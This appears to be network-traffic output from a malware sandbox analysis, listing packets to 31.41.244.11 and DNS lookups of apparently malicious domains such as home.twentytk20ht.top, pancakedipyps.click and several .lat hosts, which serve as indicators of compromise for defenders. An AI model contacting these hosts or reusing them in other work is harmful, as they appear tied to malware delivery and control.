                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.363281012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.363889933 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.363941908 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.364001989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.364047050 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.364773035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.364821911 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.364900112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.364948034 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.365668058 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.365776062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.365859032 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.366583109 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.366645098 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.366687059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.366750956 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.367425919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.367484093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.367546082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.367676020 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.368307114 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.368406057 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.368422985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.368618965 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.369198084 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.369306087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.369333029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.369489908 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.370078087 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.370178938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.370203018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.370249033 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.370970964 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.371041059 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.371066093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.371113062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.371844053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.371903896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.371949911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.372000933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.372771025 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.372862101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.372930050 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.373054981 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.373373985 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374124050 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374185085 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374248028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374296904 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374706030 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374742031 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374777079 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.374819040 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.375370026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.375437021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.375576019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.375617981 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.376283884 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.376333952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.376384020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.376425982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.377187967 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.377229929 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.377288103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.377329111 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.378092051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.378134966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.378204107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.378247023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.378918886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.378962040 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.379044056 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.379086018 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.379776955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.379821062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.379889965 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.379944086 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.380700111 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.380742073 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.380815983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.380856991 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.381561041 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.381616116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.381660938 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.381711006 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.382478952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.382515907 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.382582903 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.382623911 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.383342981 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.383388996 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.383476973 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.383512020 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.384198904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.384243011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.384310961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.384356022 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.385104895 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.385148048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.385189056 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.385231018 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.385987997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.386030912 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.386101961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.386143923 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.386820078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.386862040 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.386976957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.387018919 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.387692928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.387733936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.387830019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.387873888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.466809988 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.467187881 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.467271090 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.467350006 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.467387915 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.467407942 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.467447996 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.471579075 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514178991 CET49806443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514214993 CET49807443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514251947 CET44349807185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514269114 CET44349806185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514364958 CET49807443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514611959 CET49806443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514611959 CET49806443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514700890 CET44349806185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514802933 CET49807443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.514815092 CET44349807185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.533771992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.534054995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.534106970 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.534182072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.534410954 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.534456968 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.534499884 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.534672976 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.535235882 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.535388947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.535434008 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.536173105 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.536338091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.536381960 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.536973953 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.537028074 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.537094116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.537169933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.537930965 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.538115025 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.538162947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.538769007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.538935900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.538983107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.539617062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.539758921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.539800882 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.540534019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.540661097 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.540704012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.541409969 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.541551113 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.541591883 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.542293072 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.542411089 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.542453051 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.543167114 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.543286085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.543334007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.544059038 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.544097900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.544289112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.544977903 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.545022011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.545063972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.545852900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.545895100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.546035051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.546075106 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.546796083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.546873093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.547000885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.547629118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.547677994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.547775984 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.548515081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.548563004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.548683882 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.549372911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.549421072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.549534082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.549664974 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.550226927 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.550276995 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.550355911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.550463915 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.551178932 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.551270008 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.551317930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.551996946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.552145958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.216296911 CET192.168.2.41.1.1.10xe067Standard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.014359951 CET192.168.2.41.1.1.10x7725Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.014465094 CET192.168.2.41.1.1.10xdc79Standard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.415261030 CET192.168.2.41.1.1.10xdbb8Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.376137972 CET192.168.2.41.1.1.10x1d07Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.876686096 CET192.168.2.41.1.1.10x3b29Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.876786947 CET192.168.2.41.1.1.10x6fc9Standard query (0)home.twentytk20ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:50.459147930 CET192.168.2.41.1.1.10x80bfStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:50.983522892 CET192.168.2.41.1.1.10x878cStandard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:50.983613968 CET192.168.2.41.1.1.10xbe40Standard query (0)home.twentytk20ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:54.039133072 CET192.168.2.41.1.1.10x5d44Standard query (0)toptek.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:05.883028030 CET192.168.2.41.1.1.10xcca1Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:06.302972078 CET192.168.2.41.1.1.10x3011Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:06.792920113 CET192.168.2.41.1.1.10xcbdfStandard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:15.121445894 CET192.168.2.41.1.1.10x2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:15.121881962 CET192.168.2.41.1.1.10x19aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:22.517395973 CET192.168.2.41.1.1.10x979bStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:22.683856010 CET192.168.2.41.1.1.10xb5ffStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:44.345079899 CET192.168.2.41.1.1.10xc7c8Standard query (0)twentytk20ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:44.345079899 CET192.168.2.41.1.1.10xd3faStandard query (0)twentytk20ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:44.651108027 CET192.168.2.41.1.1.10xc7c8Standard query (0)twentytk20ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.847605944 CET192.168.2.41.1.1.10xa3a9Standard query (0)twentytk20ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.847759008 CET192.168.2.41.1.1.10x34a8Standard query (0)twentytk20ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:55.668777943 CET192.168.2.41.1.1.10x245Standard query (0)cheapptaxysu.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:58.035506010 CET192.168.2.41.1.1.10xb453Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:58.199549913 CET192.168.2.41.1.1.10xfec7Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:01.176438093 CET192.168.2.41.1.1.10xf27cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:01.176561117 CET192.168.2.41.1.1.10x87d0Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.541040897 CET1.1.1.1192.168.2.40xe067No error (0)pancakedipyps.click172.67.209.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.541040897 CET1.1.1.1192.168.2.40xe067No error (0)pancakedipyps.click104.21.23.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.300801992 CET1.1.1.1192.168.2.40x7725No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.300801992 CET1.1.1.1192.168.2.40x7725No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.553755999 CET1.1.1.1192.168.2.40xdbb8No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.513497114 CET1.1.1.1192.168.2.40x1d07No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.513497114 CET1.1.1.1192.168.2.40x1d07No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.513497114 CET1.1.1.1192.168.2.40x1d07No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.513497114 CET1.1.1.1192.168.2.40x1d07No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:46.530663013 CET1.1.1.1192.168.2.40x3b29No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:50.596633911 CET1.1.1.1192.168.2.40x80bfNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:51.121655941 CET1.1.1.1192.168.2.40x878cNo error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:54.459861994 CET1.1.1.1192.168.2.40x5d44No error (0)toptek.sbs94.130.188.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:06.107027054 CET1.1.1.1192.168.2.40xcca1Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:06.695946932 CET1.1.1.1192.168.2.40x3011Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
